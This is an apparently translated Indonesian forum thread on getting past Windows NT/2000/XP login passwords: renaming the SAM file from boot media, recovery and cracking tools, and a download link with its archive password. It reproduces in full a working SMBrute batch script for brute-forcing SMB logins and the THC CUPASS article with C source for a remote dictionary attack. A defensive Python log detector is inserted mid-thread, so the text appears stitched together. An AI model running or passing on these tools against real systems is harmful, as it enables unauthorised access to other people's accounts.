Posted: Mon Jun 06, 2005 12:01 pm   

Whee, nice info here....... :lol: :lol:, thanks.


 
 
MAS 
Posted: Thu Jun 09, 2005 2:27 am   Confused....???

Okaaay... I've been getting complaints from lots of people because apparently they're still confused playing around with the shell, the registry and all that other stuff. If it's too hard, just use MiniPE.... it has a GUI right there for grabbing passwords. There are 2 tools in it, namely Password Renew and SAMInside.
 
 
andhee 
Oprek Rookie



Age: 35
Joined: 03 Jun 2005
Posts: 1327
Location: Jakarta
Posted: Thu Jun 09, 2005 2:53 am   

Oh yeah, how do you open an encrypted My Documents???

Say my XP login uses a password and the contents of My Docs can only be opened by me; suddenly the HDD errors out and I want to retrieve my data in My Docs. How do I open it???

 
 
MAS 
Posted: Thu Jun 09, 2005 8:07 am   

Is that retrieval offline or online? Offline means this: if the folder is encrypted and taken using a live CD, the folder won't be openable because Windows uses 128-bit encryption; the only way is to repair the MBR/disk partition first, then it can be opened. Even by force (brute forcing) it can take a long time, or you can try using SAMInside to "guess" the encryption.
 
 
MAS 
Posted: Sun Aug 28, 2005 5:40 pm   

@andhee: here's how, if you don't want to get confused...

When you try to open a folder in Microsoft Windows XP, you may receive the following error message, where Folder is the name of the folder that you cannot open:
Folder is not accessible. Access is denied.
CAUSE
This issue may occur if the folder that you cannot open was created on an NTFS file system volume by using a previous installation of Windows, and then installing Windows XP. This issue may occur although you enter the correct user name and password. This issue occurs because the security ID for the user has changed. Although you use the same user name and password, your security ID no longer matches the security ID of the owner of the folder that you cannot open.

For example, although you use the same user name and password, you may no longer have permission to open the folder after you complete the following steps:

RESOLUTION
To resolve this issue, you must turn off Simple File Sharing, and then take ownership of the folder:
1. Turn off Simple File Sharing:
a. Click Start, and then click My Computer.
b. On the Tools menu, click Folder Options, and then click the View tab.
c. Under Advanced Settings, click to clear the Use simple file sharing (Recommended) check box, and then click OK.
2. Right-click the folder that you want to take ownership of, and then click Properties.
3. Click the Security tab, and then click OK on the Security message, if one appears.
4. Click Advanced, and then click the Owner tab.
5. In the Name list, click your user name, Administrator if you are logged in as Administrator, or click the Administrators group.

If you want to take ownership of the contents of that folder, click to select the Replace owner on subcontainers and objects check box.
6. Click OK.

You may receive the following error message, where Folder is the name of the folder that you want to take ownership of:
You do not have permission to read the contents of directory Folder. Do you want to replace the directory permissions with permissions granting you Full Control? All permissions will be replaced if you press Yes.
7. Click Yes.
8. Click OK, and then reapply the permissions and security settings that you want for the folder and the folder contents.

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Aug 28, 2005 5:41 pm   

Oh yeah, there's one more way to break the admin password without any program; here's how....


It does not require any 3rd party software, simply a bootable floppy/cdrom. It involves renaming the WINDOWS user database file (SAM) effectively resetting all authentication.

To get access into a locked out system, simply follow these steps. It will work on Windows NT/2000/XP including server editions, because of the way authentication is handled by windows.

1> change the boot sequence of your system and set it to boot from the floppy/CD drive.

2> insert the Bootable floppy or CD and power on your system.

3> after the system boots from the drive and halts at a prompt, type the following

cd c: (or wherever your windows partition is located)
cd C:\WINNT\system32\config ( replace c:\WINNT with your windows folder)

now rename the SAM file. The file has no extension so your command can be something like this :

C:\WINNT\system32\config>ren sam sam.bak

Now the next time when you boot, all your passwords will be reset to blank, as windows rebuilds the user database and the SAM file. Possibly all the users you have defined and any domain affiliations may be lost as well.

So use this at your own risk and preferably on standalone machines which you want to gain access to.

_________________
tested
 
 
Andrean
baru ng-Oprek


Joined: 18 Sep 2005
Posts: 10
Posted: Wed Sep 21, 2005 7:45 pm   Password reset doesn't work

Hello guys..
Sorry in advance because I'm a newbie.. here goes, I have a problem using the 3 steps to reset the admin password on XP, even though I've tried to follow the 3 methods in this forum, among others:
1. the method that renames taskmgr.exe to logon.scr = didn't work because on my side I'm in the "Guest" login, so copy and delete access can't be done. Secondly, in the registry I also didn't find the autoadminlogon hive.
2. the method of zeroing the BIOS clock to 00:00:00 and then Ctrl+F9 also didn't work, because Ctrl+F9 on my computer, a genuine IBM with XP SP1, does nothing.
3. the boot-from-floppy method aimed at renaming the SAM file also didn't work, because my HD partition is full NTFS, not FAT. I think that method only applies to FAT32 partitions.

In the end I tried booting with an NTFS boot loader that can read NTFS; I could copy my files that are in the password-protected Administrator login, but still couldn't get in as administrator.

Please enlighten me, ... thanks... :(

 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Fri Sep 23, 2005 4:08 pm   

1. Yup, you're right, that's why it can't be done on a guest logon.

2. Change your keyboard then.... other members have tried it and succeeded. I guarantee it.

3. That's not right; who says it's only for FAT32? Try reading the original URL link and it'll be clearer that it works for all partition types.

or.... use this method

1. download and use MiniPE as in that screenshot

2. use Hiren's BootCD or make a 911 CD, or one of the Linux recovery CDs discussed in several threads here; they're there and all of them work, no problem.

_________________
tested
 
 
Andrean
baru ng-Oprek


Joined: 18 Sep 2005
Posts: 10
Posted: Sat Sep 24, 2005 5:53 pm   

:) in the end I just used SAMInside.. that works, bro

hehe... but I'm still curious about the boot floppy one, really,
Do you boot with NTFSDos.. (not the usual DOS boot)?

thanks all ..

 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Sep 25, 2005 10:22 am   

Riiight mas.... the difference between SAMInside and Peter's tool is "syskey"; what's that? It was already discussed clearly above, about the LMHash and NTHash protection...

So it's not that the program can't open it, but that the protection has been activated via regedit, so that "stealing" the password in the SAM file can't make any changes at all!!!

SAMInside, after all, only "looks and peeks" at what the password is, right???

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Wed Sep 28, 2005 8:07 pm   

OK, here's the method that may have been awaited .... finding passwords over the network...!!!

SMBrute

Some folks on a forum I frequent ( http://www.thebroken.org ) asked about brute forcing Windows passwords remotely. Brutus (http://www.hoobie.net/brutus/) can do it, but I've had problems with its reliability against SMB shares. Here's a little batch script I wrote that uses Windows 2000/XP's "NET" command to find the password for a given account. I cribbed my password list from the folks that wrote Cain and Abel (http://www.oxid.it/) but you can use any list you want. Download script and Cain's password file from http://www.irongeek.com/downloads/smbrute.zip. This is a very crude way to get the password to a remote Windows box, and if anyone audits the logs they will see a lot of failed login attempts. Be careful how you use this script as many systems are set up so that they lock accounts after too many failed login attempts.

Usage: smbrute machinename local-account-to-crack

Code "SMBrute.bat":

@echo off
echo SMBrute Script, Written by Irongeek: http://www.irongeek.com
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and output.txt (Holds password and machine name)
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
if "%1"=="" goto end
if "%2"=="" goto end
del log.txt
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
:end
echo *****Done*****


Comments:

Don't show the commands we are running, just to make it pretty
Print out how to use the script.


Tell the user to put the word list in the same directory as the script.
Make sure the user gives input.

Delete the old log file.
Loop until the end of the password list file.
Print the current password attempt to the screen.
Use the "NET USE" command to try and start a session.
Write valid passwords to the output file.


You're done.


*do at your own risk! for educational purposes only*

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Mon Nov 14, 2005 9:18 am   

There's another one... it's called "windowskey", the file is only under 10 MB. Its origin, URL and so on are in the screenshot....
_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Mon Nov 21, 2005 6:09 pm   

There's anotherrr one... called CUPASS, you can find it at THC (just google it); as for what CUPASS is and how it works, please read here first....


----| INTRODUCTION



Microsoft has a known problem in Windows NT 4, that enables an attacker
to change the password of any user under special/default circumstances.


The same problem reappeared in Windows 2000 some days ago. The flaw exists
in Microsoft's implementation of the NetUserChangePassword function.


These facts inspired me to write this article and CUPASS, a simple tool
that starts a dictionary attack against user accounts.


In this article I want to discuss all things worth knowing about the
NetUserChangePassword problem.


Have fun while reading this article...


Doc Holiday /THC




----| THE PASSWORD CHANGE PROTOCOLS


As a little background I will tell you something about the possibilities
to change a password in a Windows NT/W2K environment.


Windows 2000 supports several protocols for changing passwords which
are used under different circumstances.


These protocols are


- NetUserChangePassword protocol (we will call it NUCP)
- NetUserSetInfo protocol
- Kerberos change-password protocol
- Kerberos set-password protocol
- LDAP write-password attribute (presumes 128Bit SSL)
- XACT-SMB protocol (for LAN Manager compatibility)


Because there is a flaw in Microsoft's implementation of the NUCP protocol,
we will have a deeper look at this one.



----| PROTOCOL ELECTION


We can see that there are a lot of protocols for changing passwords in a
Microsoft environment. Now I will show in which cases the NUCP is used:


case 1
------


If a user changes his password by pressing CTRL+ALT+DELETE and pressing the
"Change Password" button, the NUCP protocol is used, if the target is a
domain or the local member server or workstation.


If the target is a Kerberos realm, the Kerberos change-password protocol is
used instead of NUCP.


case 2
------


If a change password request is initiated from a Windows NT 3.x or NT 4
machine, the NUCP and/or NetUserSetInfo protocols are used.


case 3
------


If a program uses the NUCP method on the Active Directory Services
Interface (ADSI), the IaDSUser interface first tries to change the
password with the LDAP protocol, and then by using the NUCP method.




----| NUCP FUNCTION CALL


At this time we know that a lot of ways exist to change a user's
password. We also know in which cases NUCP is used.


Now we want to have a little look at the function NetUserChangePassword
itself. (More detailed information can be found at Microsoft's SDK!)



Prototype
---------


The prototype of the NetUserChangePassword function is defined in
"lmaccess.h", and looks as follows:



NET_API_STATUS NET_API_FUNCTION
NetUserChangePassword (
IN LPCWSTR domainname OPTIONAL,
IN LPCWSTR username OPTIONAL,
IN LPCWSTR oldpassword,
IN LPCWSTR newpassword
);



The parameters are explained consecutively:



Parameters
----------


->domainname
----------


Pointer to a null-terminated Unicode string that specifies the name of a
remote server or domain.


->username
--------


Pointer to a null-terminated Unicode string that specifies a user name.


->oldpassword
-----------


Pointer to a null-terminated Unicode string that specifies the user's
old password on the server or domain.


->newpassword
-----------


Pointer to a null-terminated Unicode string that specifies the user's new
password on the server or domain.



Return values
-------------


The return values are defined in "LMERR.H" and "WINERROR.H".


With a deeper look in these files we can see that if the function was executed
with success, the return value is 0 (zero), i.e. NERR_Success.



The most important error values are:


->ERROR_ACCESS_DENIED (WINERROR.H)
--------------------------------


Access is denied ;)


If the target is a NT Server/Domain Controller, and the
option "User Must Log On in Order to Change Password" is enabled,
this error code is the result of CUPASS. The password could
not be guessed :(


If the target is a W2K domain controller with AD installed,
and the EVERYONE group is removed from the group
"Pre-Windows 2000 compatible access", then this error code
is a result of NUCP.


In some cases this means the right password was guessed by
CUPASS, but could not be changed because of insufficient
permissions on the corresponding AD object.



->ERROR_INVALID_PASSWORD (WINERROR.H)
-----------------------------------


The guessed password (oldpassword) was invalid



->ERROR_ACCOUNT_LOCKED_OUT (WINERROR.H)
-------------------------------------


The account is locked due to many logon tries.



->ERROR_CANT_ACCESS_DOMAIN_INFO (WINERROR.H)
------------------------------------------


Indicates a Windows NT Server could not be contacted or that
objects within the domain are protected such that necessary
information could not be retrieved.



->NERR_UserNotFound (LMERR.H)
---------------------------


The user account could not be found on the given server.



->NERR_NotPrimary (LMERR.H)
-------------------------


The operation is only allowed on the PDC. This appears e.g. if
you try to change passwords on a BDC.



These return values are evaluated by CUPASS. For all others, the numeric
value will be shown, and you can simply have a look at these files for
the meaning of the error code.




MORE DETAILS ON NUCP API CALL
-----------------------------


The NUCP function is only available on Windows NT and Windows 2000
platforms.


As part of the LanMan-API the NUCP function is UNICODE only!!!
This makes the programming a little bit harder, but not impossible :)


UNICODE on Windows is a topic of its own, and we don't want to talk more
about it here. Have a look at Microsoft's msdn webpage or Charles
Petzold's book about Windows programming, if you are interested in this
topic.


For a successful usage of NUCP, you have to link your program with the
"Netapi32.lib" library!




----| REQUIRED PERMISSIONS FOR NUCP


NUCP is part of the Microsoft network management functions.
The management functions consist of different groups like
NetFileFunctions, ScheduleFunctions, ServerFunctions, UserFunctions etc.


These functions are again split into Query Functions and Update Functions.
Whilst query functions just allow to query information, the update
functions allow changes on objects.


An example for a query function is e.g. the NetUserEnum function which
provides information about all user accounts on a server.


An example for an update function is the NetUserChangePassword function
which changes the password of a user account :)


It's easy to imagine that query functions need fewer permissions than update
functions for being executed.



Let's have a look at what permissions are needed:



WINDOWS NT
----------


The query functions like NetGroupEnum, NetUserEnum etc. can be
executed by all authenticated users.


This includes Anonymous users, if the RestrictAnonymous policy setting
allows anonymous access.


On a Windows NT member server, workstation or PDC, the
NetUserChangePassword function can only be (successfully) executed by
Administrators, Account Operators or the user of the account, if the option
'User Must Log On in Order to Change Password' for this user is enabled.


If 'User Must Log On in Order to Change Password' is not enabled, a user can
change the password of any other user, as long as he knows the actual password.



WINDOWS 2000
------------


The query functions like NetGroupEnum, NetUserEnum etc. can be executed by
all authenticated users. This includes Anonymous users, if the
RestrictAnonymous policy setting allows anonymous access.


On a W2K member server or workstation the NetUserChangePassword function
should only be (successfully) executable by Administrators, Account
Operators or the user of the account.


That this isn't the case can be shown with CUPASS, because here is the
flaw that Microsoft made with its implementation of NetUserChangePassword.


On W2K member servers and workstations, the NetUserChangePassword function
can be successfully executed by any user who knows the current password of
the attacked user account.



( For your information:


The option 'User Must Log On in Order to Change Password' has been removed
from W2K! )



On a W2K domain controller with Active Directory, access to an object is
granted based on the ACL of the object (Because W2K with installed AD
stores the user passwords in the AD in contrast to NT 3.x/4).


Network management query functions are permitted to all authenticated
users and the members of the group "Pre-Windows 2000 compatible access"
by the default ACLs.


Theoretically, Network Management Update functions like NUCP are only
permitted to Administrators and Account Operators.


That this is not the case, can also be shown with CUPASS.


CUPASS works fine if AD is installed on the target system.


If the "everyone" group is removed from the
"Pre-Windows 2000 compatible access" group, the result of CUPASS will
be Errorcode 5, which means ACCESS_DENIED!


My research shows that the password is nevertheless guessed by CUPASS, but
cannot be changed because of insufficient permissions on the AD object!



----| ANONYMOUS CONNECT


There is something I didn't talk about much, the Anonymous User Problem,
also known as the NULL-User problem.


Let's have a short look at how the Anonymous security settings affect
the NUCP problem:


-> W2K
---


The Data of the following registry value regulates the behaviour
of the operating system regarding the NULL USER CONNECT.


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
Value: RestrictAnonymous
Value Type: REG_DWORD


If RestrictAnonymous is set to 0 (zero), which is the default setting,
CUPASS will work properly.


If RestrictAnonymous is set to 1, which means the enumeration of SAM
accounts and names is not allowed, CUPASS will work properly.

If RestrictAnonymous is set to 2, which means no access without explicit
anonymous permissions, there is no possibility to change the password
with NUCP :(

Because the value 2 has comprehensive consequences for the behaviour of
the windows environment (e.g. Browser service will not work properly,
netlogon secure channels could not be established properly by member
workstations etc..) it is rarely used.


These settings are the same on W2K member server and W2K DC with AD!



-> NT4
---

The Data of the following registry value regulates the behaviour
of the operating system regarding the NULL USER CONNECT.


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
Value: RestrictAnonymous
Value Type: REG_DWORD


In contrast to W2K there are only two valid values, 0 (zero) and 1, for
RestrictAnonymous.


If RestrictAnonymous is set to 0 (zero), which is the default setting,
CUPASS will work properly.


If RestrictAnonymous is set to 1, which means the enumeration of SAM
accounts and names is not allowed, CUPASS will work properly.






COMMON
------


The process that calls the NetUserChangePassword function in some cases
must have the SE_CHANGE_NOTIFY_NAME privilege
(except for system account and members of the local Administrator group).
Per default this privilege is enabled for every account, but can be
disabled by the administrator.


SE_CHANGE_NOTIFY_NAME cannot be found among the privileges,
because it is called "Bypass traverse checking"!


This is a statement from Microsoft. I tried it, but I didn't find a case
in which this right was necessary to execute the NUCP function call.




----| POLICY AND LOGGING


I will have a look at the policy settings that affect the
NUCP problem.



ACCOUNT POLICIES
----------------


->PASSWORD POLICY
---------------

The settings "Enforce password history" and "Minimum password age"
affect the result of CUPASS, in the way that CUPASS can't
"really" change the password, and the error code 2245 will result.

But this doesn't matter, because we know the "old" password at this time,
and CUPASS just tried to replace the "old" password with the "old"
password again.



->ACCOUNT LOCKOUT POLICY
---------------------

Account lockout threshold
------------------------


The settings "Account lockout duration" and
"Reset Account lockout after ..." are only relevant if the
"Account lockout threshold" is set to any value >0.


If the threshold is set, then this affects the work of CUPASS,
because all attempts of CUPASS exceeding the threshold will lead to an
account lockout :(


However the Lockout Policy is not valid for the Administrator on NT4
environments, until the NT Reskit tool "Passprop" is used!
In this case even the Administrator account will be locked
for network logons!


If we start CUPASS against any account of a W2K server or a W2K domain
controller with AD, this account is locked out, and even the
Administrator account is marked as "Account is locked out", too !


But it is still possible for the Administrator account to log on
interactive on the machine!







AUDIT POLICY
------------


Let's have a look at which auditing events have to be enabled to see a
CUPASS attack in the security logs of the target machine.



Audit Account Management
------------------------


If the setting "Audit Account Management" is enabled (success/failure),
an entry with the ID 627 appears in the security log.


This entry contains all necessary data for the administrator :(
These e.g. are: Date, Time, Target Account Name, Caller User Name etc.



Audit account logon events
--------------------------


Surprisingly for some administrators, there appears no log entry if
the settings "Audit account logon events" or "Audit logon events"
are enabled, if the attack goes to the local machine.


This is e.g. the case if you want to guess the local administrator
password of your machine.


If the CUPASS attack comes from remote, log entries ID 681 and ID 529
occur.



Audit Object Access
-------------------

If this type of auditing is enabled, and the attack goes to the
local machine, a log file entry with the ID 560 and 562 appears.


ID 560 tells us that someone opened the object
"Security Account Manager" whilst 562 tells us something like
"Handle closed"...



Maybe there occur some more log file entries with other IDs, but these
ones listed above are the ones I found while testing CUPASS.


So test CUPASS on your own environment and have a look into your logfiles!




----| LAST WORDS


I hope this article could give you a little overview about the
NetUserChangePassword problem, and Microsoft's inconsistent implementation
of security and function calls.


This article could not treat this topic conclusively, because there are
so many different situations and configurations that I could not test
in my short spare time :)



----| GREETS


Greets to Van Hauser who inspired me for this release, ganymed, mindmaniac
and all the other members from THC, VAX who gives me a lift to HAL2001,
the guys from TESO, Seth, Rookie and all the other people knowing me...


The biggest THANX are going to my wife, who missed me nearly the whole
weekend while I was writing this article!

Ok, have a nice day and let's meet and party at HAL2001 :)



Code:
<++> cupass.cpp !a10c7302
/*
 * CUPASS v1.0 (c) 2001 by Doc Holiday / THC <[email protected]>
 * http://www.hackerschoice.com
 *
 * Dictionary Attack against Windows Passwords with NetUserChangePassword.
 * Do only use for legal purposes.
 *
 * Compiled and tested on Windows NT/W2K - runs not on Win9x!!
 * Compiled with VC++ 6.0
 *
 */


#define UNICODE 1
#define _UNICODE 1


#include <windows.h>
#include <lmaccess.h>
#include <stdio.h>
#include <wchar.h>


#pragma comment( lib, "netapi32.lib" )



void wmain( int argc, wchar_t *argv[] )
{
        wchar_t *hostname = 0;
        wchar_t *username = 0;
        wchar_t *dictfile = 0;
        wchar_t myChar[256];
        NET_API_STATUS result;
        FILE *stream;
        LPWSTR oldpassword;


        if (argc != 4)
        {
        wprintf (L"\nMissing or wrong parameters!\n");
            wprintf (
               L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
            exit(1);
        }


        hostname = argv[1];
        username = argv[2];
        dictfile = argv[3];


    if (wcsncmp(hostname, L"\\\\",2 )!=0)
        {
            wprintf (L"\nups... you forgot the double backslash?");
            wprintf (
                L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
            exit(1);
        }


  if( (stream  = _wfopen( dictfile, L"r" )) == NULL )
        {
      wprintf( L"\nups... dictionary %s could not be opened", dictfile );
      wprintf (L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
        }
   else
   {
       
        wprintf (L"\n*** CUPASS 1.0 - Change User PASSword - by Doc Holiday/THC (c) 2001 ***\n");
        wprintf (L"\nStarting attack .....\n");
        wprintf (L"\nTarget: %s ", hostname);
        wprintf (L"\nUser: %s\n ", username);


        while( !feof( stream ) )
        {
          fgetws (myChar, 256,stream);


          if (myChar[wcslen(myChar)-1] == '\r') myChar[wcslen(myChar)-1] = '\0';
          if (myChar[wcslen(myChar)-1] == '\n') myChar[wcslen(myChar)-1] = '\0';


          oldpassword = myChar;
   
          wprintf( L"\nTrying password %s \n", oldpassword );
               
          result = NetUserChangePassword( hostname, username,oldpassword, oldpassword );
               
          switch (result)
          {
                case 0:
                        wprintf( L"GOTCHA!! Password was changed\n" );
                        wprintf( L"\nPassword from user '%s' is '%s'\n", username, oldpassword);
                        fclose (stream);
                        exit (1);
                        break;
                       
                case 5: //ERROR_ACCESS_DENIED
                        wprintf (L"Attempt failed -> ERROR_ACCESS_DENIED - But password could be %s\n", oldpassword);
                        fclose (stream);
                        exit(1);
                        break;
                       
                case 86: //ERROR_INVALID_PASSWORD
                        wprintf( L"Attempt failed -> Incorrect password\n" );
                        break;
                       
                case 1351: //ERROR_CANT_ACCESS_DOMAIN_INFO
                        wprintf (L"Attempt failed -> Can't establish connection to Host %s\n",hostname);
                        fclose (stream);
                        exit(1);
                        break;


                case 1909: //ERROR_ACCOUNT_LOCKED_OUT
                        wprintf (L"Attempt failed -> Account locked out\n");
                        fclose (stream);
                        exit(1);
                        break;


                case 2221: //NERR_UserNotFound)
                        wprintf (L"Attempt failed -> User %s not found\n", username);
                        fclose (stream);
                        exit(1);                   
                        break;
                       
                case 2226://NERR_NotPrimary
                        wprintf (L"Attempt failed -> Operation only allowed on PDC\n");
                        break;


                case 2245:
                        wprintf (L"GOTCHA!! Password is '%s' , but couldn't be changed to '%s' due to password policy settings!\n", oldpassword, oldpassword);
                        fclose(stream);
                        exit(1);
                        break;


                default:
                        wprintf( L"\nAttempt failed :( %lu\n", result );
                        fclose(stream);
                        exit(1);
                        break;
                }
        }
        fclose (stream);
   }   
}
<--> end cupass.cpp

|=[ EOF ]=---------------------------------------------------------------=|
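The SMBrute post above warns that anyone auditing the logs will see a lot of failed login attempts, and the CUPASS article lists the Security-log event IDs a guessing run leaves behind (627 for password change attempts, 529 and 681 for remote logon failures). The following Python is an added example for this thread, not code from either post nor from Irongeek or THC: it runs a small burst detector over a constructed, simplified log extract. The tab-separated record layout, the account names and the timestamps are my own assumptions, not Microsoft's native event-log format; the alert threshold mirrors the "Account lockout threshold" count the article discusses, and a successful 627 that follows a burst from the same source is flagged separately, since CUPASS passes the guessed password as both old and new, so a success means the password was actually changed.

```python
"""Burst detector for password-guessing traces in Windows NT/2000 Security logs.

Added example for this thread, not code from the SMBrute or CUPASS posts nor
from Irongeek or THC.  The event IDs are the ones the CUPASS article names:
627 (password change attempt, Audit Account Management), 529 (logon failure:
unknown user name or bad password) and 681 (account logon failure).  The
tab-separated record layout and the sample records below are constructed for
this example and are not Microsoft's native event-log format.
"""
from __future__ import annotations

from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

PASSWORD_CHANGE_ATTEMPT = 627
LOGON_FAILURE = 529
ACCOUNT_LOGON_FAILURE = 681
GUESSING_EVENTS = {PASSWORD_CHANGE_ATTEMPT, LOGON_FAILURE, ACCOUNT_LOGON_FAILURE}

# Constructed extract: timestamp, event id, outcome, target account,
# caller user name ("-" when the record carries none), workstation.
SAMPLE_LOG = """\
2005-09-28 20:01:02\t627\tFailure\tAdministrator\tANONYMOUS LOGON\tWKS-A
2005-09-28 20:01:03\t627\tFailure\tAdministrator\tANONYMOUS LOGON\tWKS-A
2005-09-28 20:01:03\t627\tFailure\tAdministrator\tANONYMOUS LOGON\tWKS-A
2005-09-28 20:01:04\t627\tFailure\tAdministrator\tANONYMOUS LOGON\tWKS-A
2005-09-28 20:01:05\t627\tFailure\tAdministrator\tANONYMOUS LOGON\tWKS-A
2005-09-28 20:01:06\t627\tSuccess\tAdministrator\tANONYMOUS LOGON\tWKS-A
2005-09-28 20:02:00\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:02:01\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:02:02\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:02:03\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:02:04\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:02:05\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:02:06\t529\tFailure\tbob\t-\tWKS-B
2005-09-28 20:30:00\t627\tSuccess\talice\talice\tWKS-C
"""


@dataclass(frozen=True)
class Event:
    when: datetime
    event_id: int
    outcome: str   # "Success" or "Failure"
    target: str    # account whose password is being guessed (lower-cased)
    source: str    # caller user name if present, else workstation name


@dataclass
class Alert:
    kind: str      # "guessing-burst" or "password-changed-after-burst"
    target: str
    source: str
    count: int
    first: datetime
    last: datetime


def parse_log(text: str) -> list[Event]:
    """Parse the constructed tab-separated extract into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, outcome, target, caller, workstation = line.split("\t")
        source = caller if caller != "-" else workstation
        events.append(Event(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                            int(eid), outcome, target.lower(), source))
    return events


def find_bursts(events: list[Event], threshold: int = 5,
                window: timedelta = timedelta(seconds=60)) -> list[Alert]:
    """One alert per (target, source) pair whose failed guessing events inside
    `window` reach `threshold`; further failures extend that alert.  A
    successful 627 from the same source after an open burst gets its own
    alert: the guess landed and the password was changed."""
    recent: dict[tuple[str, str], deque[datetime]] = defaultdict(deque)
    open_bursts: dict[tuple[str, str], Alert] = {}
    alerts: list[Alert] = []
    for ev in sorted(events, key=lambda e: e.when):
        if ev.event_id not in GUESSING_EVENTS:
            continue
        key = (ev.target, ev.source)
        if ev.outcome == "Failure":
            q = recent[key]
            q.append(ev.when)
            while ev.when - q[0] > window:      # drop attempts outside the window
                q.popleft()
            burst = open_bursts.get(key)
            if burst is not None:
                burst.count += 1
                burst.last = ev.when
            elif len(q) >= threshold:
                burst = Alert("guessing-burst", ev.target, ev.source,
                              len(q), q[0], ev.when)
                open_bursts[key] = burst
                alerts.append(burst)
        elif ev.event_id == PASSWORD_CHANGE_ATTEMPT and key in open_bursts:
            alerts.append(Alert("password-changed-after-burst", ev.target,
                                ev.source, 1, ev.when, ev.when))
    return alerts


def describe(alert: Alert) -> str:
    return (f"{alert.kind}: target={alert.target} source={alert.source} "
            f"count={alert.count} {alert.first:%H:%M:%S}-{alert.last:%H:%M:%S}")


if __name__ == "__main__":
    for a in find_bursts(parse_log(SAMPLE_LOG)):
        print(describe(a))
```

On the constructed extract this yields three alerts: a burst of five 627 failures against Administrator from ANONYMOUS LOGON, the successful change that follows it, and a burst of seven 529 failures against bob from WKS-B; alice's single successful change raises nothing. Real deployments would feed the detector with records exported from the Security log and tune `threshold` to match the configured lockout threshold.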


 
 
opique
baru ng-Oprek


Joined: 07 Dec 2005
Posts: 16
Location: Bekasi
Posted: Wed Dec 07, 2005 2:21 pm   Already tried

MAS
Boss.. I've tried the override-user-agent one, but there's no sign at all.. only a flash of the a.bat executing, then when the user logs off nothing changes. Then I tried going into regedit to edit AutoAdminLogon, that didn't work either.
Then I tried the one from the BIOS.. well, the computer is a Compaq so the BIOS is Compaq; I set the clock to "00:00", pressed Ctrl+F9, Enter, and it didn't ask for a password at all... so confusing; if I want to use MiniPE, where do I download it, Boss?? I looked on download.com and it's not there... thank you
Btw... this Windows is Windows 2000 Professional, Boss

_________________
Opique Dharma
--from Depok with love--
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Wed Dec 07, 2005 2:24 pm   

The one taken from here http://home.eunet.no/%7Epnordahl/ntpasswd/, have you tried it...? No problem, whether W2K/W2K3/XP it's all the same.
_________________
tested
 
 
opique
baru ng-Oprek


Joined: 07 Dec 2005
Posts: 16
Location: Bekasi
Posted: Fri Dec 09, 2005 5:44 pm   

MAS wrote:
The one taken from here http://home.eunet.no/%7Epnordahl/ntpasswd/, have you tried it...? No problem, whether W2K/W2K3/XP it's all the same.


Boss... I've tried this one, success.. thx. But... there's a but, Boss... all the existing usernames can't be used any more, they're all gone... all that's left is the default username without a password. That's bad if the Boss wants to use his username and it's not there.
Is this how it's supposed to work... or did I get the procedure wrong, Boss?
Please enlighten me.. thxalot

_________________
Opique Dharma
--from Depok with love--
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sat Dec 10, 2005 10:04 pm   

Yup.... it was already explained that it will make some folders that are set private disappear; in that case the SYSKEY in those folders can still be decrypted to open them. Have a look at SAMDUMP, WINDUMP or even SAMINSIDE.... good luck.
_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Mon Dec 12, 2005 9:18 am   

OK... many people have tried the trick with that syslinux bootable made by Peter Pnordahl; many succeeded and many failed too. As a step to make it even easier and more familiar to Windows users, here I'm uploading another "rare item", truly rare because this password resetter uses a Windows interface and is very familiar.... please try it out.

Code:
http://rapidshare.de/files/9017508/windowskey.rar


password : oprekpc

Sorry... whether it fails or succeeds, please share your stories, yeah.... hihihihi.

_________________
tested
 
 
doi_cucok
belajar ng-Oprek



Joined: 06 Jan 2006
Posts: 113
Location: Cyber Space (^_-)b
Posted: Sat Mar 04, 2006 6:52 am   

Coooool.......... there's a lot I didn't know from all of MAS's techniques!!! awesome....!!! :lol:
_________________
===========================
Peace, Love and Hanging Out,
Doi Cucok (-_^)b
http://www.friendster.com/riski
===========================
 
 